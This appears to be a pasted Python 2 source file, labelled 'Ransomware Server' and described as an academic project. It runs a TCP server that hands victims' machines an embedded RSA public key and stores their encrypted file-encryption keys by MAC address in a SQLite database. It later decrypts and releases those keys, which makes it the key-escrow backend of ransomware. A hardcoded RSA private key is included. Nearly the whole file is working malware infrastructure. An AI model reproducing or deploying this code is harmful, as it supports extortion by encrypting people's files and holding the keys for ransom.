· 10 years ago · Sep 19, 2016, 01:18 AM
1#!/usr/bin/env python
2
3"""
4Summary: This is a script for a server of an academical project.
5
6MIT License
7
8Copyright (c) [2016] [nanowormer]
9
10Permission is hereby granted, free of charge, to any person obtaining a copy
11of this software and associated documentation files (the "Software"), to deal
12in the Software without restriction, including without limitation the rights
13to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
14copies of the Software, and to permit persons to whom the Software is
15furnished to do so, subject to the following conditions:
16
17The above copyright notice and this permission notice shall be included in all
18copies or substantial portions of the Software.
19
20THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
21IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
22FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
23AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
24LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
25OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
26SOFTWARE.
27"""
28
29#############
30# LIBRARIES #
31#############
32import SocketServer
33import os
34import base64
35import sqlite3
36import sys
37from threading import Thread
38from Crypto.Cipher import PKCS1_OAEP
39from Crypto.PublicKey import RSA
40
41################
42# DB FUNCTIONS #
43################
44#Creates new database and table
45def create_cleandb():
46 conn = sqlite3.connect('ransom.sqlite')
47 cur = conn.cursor()
48 cur.execute('''
49 DROP TABLE IF EXISTS key_mac '''
50 )
51
52 cur.execute('''
53 CREATE TABLE key_mac (key TEXT, mac TEXT, count INTEGER)'''
54 )
55 conn.commit()
56 cur.close()
57
58#Checks if mac is already on the record and deltes it if so.
59def check_existent_mac(mac, cur, conn):
60 cur.execute('SELECT * FROM key_mac WHERE mac = ?', (mac, ))
61 a = cur.fetchall()
62 if len(a) > 0:
63 for element in a:
64 cur.execute('delete from key_mac where mac = ?', (mac,))
65 conn.commit()
66#
67def get_b64symetric_key(mac, cur):
68 cur.execute('SELECT key FROM key_mac WHERE mac = ?', (mac, ))
69 a = cur.fetchall()
70 if len(a) == 0:
71 print 'Not key found for mac: ' + mac
72 return 0
73 else:
74 a = a[0][0]
75 return str(a)
76
77def insert(key, mac, cur, conn):
78 check_existent_mac(mac, cur, conn)
79 cur.execute(
80 "INSERT into key_mac (key, mac) VALUES (?, ?)", (key, mac)
81 )
82 conn.commit()
83
84###################
85# CRYPTO FUNCTION #
86###################
87#Decrypt the symmetric key with RSA private.
88def decryptRSA(ciphertext, private_key):
89 cipher = PKCS1_OAEP.new(RSA.importKey(private_key))
90 return cipher.decrypt(ciphertext)
91
92########################
93# SERVER FUNCTIONALITY #
94########################
95class service(SocketServer.BaseRequestHandler):
96
97 #Request handler
98 def handle(self):
99 global list_key, private_key, public_key
100 print list_key
101 print "Client connected with ", self.client_address
102 data = self.request.recv(1024).decode()
103
104 conn = sqlite3.connect('ransom.sqlite')
105 cur = conn.cursor()
106
107 if data[0] == 'K':
108 mac = data[2:len(data)]
109 print mac
110 self.request.send(public_key)
111 encrypted_b64sym_key = self.request.recv(1024)
112 #list_key[mac] = encrypted_b64sym_key
113 insert(encrypted_b64sym_key, mac, cur, conn)
114 print "Client connected with ", self.client_address
115 print 'Key stored: ' + encrypted_b64sym_key
116 print 'From: ' + mac
117
118 elif data[0] == 'D':
119 mac = data[2:len(data)]
120 symetric_key = get_b64symetric_key(mac, cur)
121 symetric_key = decryptRSA(base64.b64decode(symetric_key), private_key)
122 print symetric_key
123 self.request.send(base64.b64encode(symetric_key).encode())
124 print "Client connected with ", self.client_address
125 print 'Key returned: ' + symetric_key
126 print 'To: ' + mac
127
128 conn.commit()
129 cur.close()
130
131 print "Client exited"
132 self.request.close()
133
134class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
135 pass
136
137#########
138# MAIN #
139########
140print " ##############################################"
141print " ### serv_min.py ###"
142print " ### Ransomware Server ###"
143print " ### 2016 ###"
144print " ###****************************************###"
145print " ### ###"
146print " ### Storing your mac & password ###"
147print " ### in ###"
148print " ### ransom.sqlite ###"
149print " ### ###"
150print " ### aaa ###"
151print " ### aa aa ###"
152print " ### aa aa ###"
153print " ### aa aa ###"
154print " ### aa aa ###"
155print " ### 888888888888888 ###"
156print " ### 888888888888888 ###"
157print " ### 888888888888888 ###"
158print " ### 888888888888888 ###"
159print " ### 888888888888888 ###"
160print " ### ###"
161print " ##############################################"
162
163input = '.'
164while input != 'y' and input != 'n':
165 input = raw_input(' Create new database? (y/n): ')
166if input == 'y': create_cleandb()
167list_key = {}
168private_key = '-----BEGIN RSA PRIVATE KEY-----\nMIIBOQIBAAJAZnbBl0a6kuXVcKumeREIpa92v/B9yJVLPnFjdZ+SeTwB30s5ElUH\nGSY2NQDN9kcTm9aJIIya1WxfOa3Ovn/RiwIDAQABAkAXZnGp0a5UVAbdt2XKalh2\nNk9BYHPpdib7+LtFJo81/nNUI1tol3JZoyOlx0OhyP8O5PZQJbr9NmOFNj/eo+7x\nAiEApb1vG5cyAyywqEQPUEwnbylzOpQP9h7/T9zFUUIIrIkCIQCeQ7bwLC+SJPsD\nsEYDZvYdplVUPh1AGynyg8pIWFPQcwIgLTMxZvPf9s+sSedtybdLFdzXCQWyKKwh\nctVBlryMgwkCIG0L8yyhBVYJLPtppZQKiWH8jaax9a2KCekTbXlTgsyJAiEAiR+o\nc0IjnGXYsUB1q11aMqTa614FXq8wxGioJtgN/90=\n-----END RSA PRIVATE KEY-----'
169public_key = '-----BEGIN PUBLIC KEY-----\nMFswDQYJKoZIhvcNAQEBBQADSgAwRwJAZnbBl0a6kuXVcKumeREIpa92v/B9yJVL\nPnFjdZ+SeTwB30s5ElUHGSY2NQDN9kcTm9aJIIya1WxfOa3Ovn/RiwIDAQAB\n-----END PUBLIC KEY----'
170server = ThreadedTCPServer(('',1520), service)
171# Activate the server; this will keep running until you
172# interrupt the program with Ctrl-C
173server.serve_forever()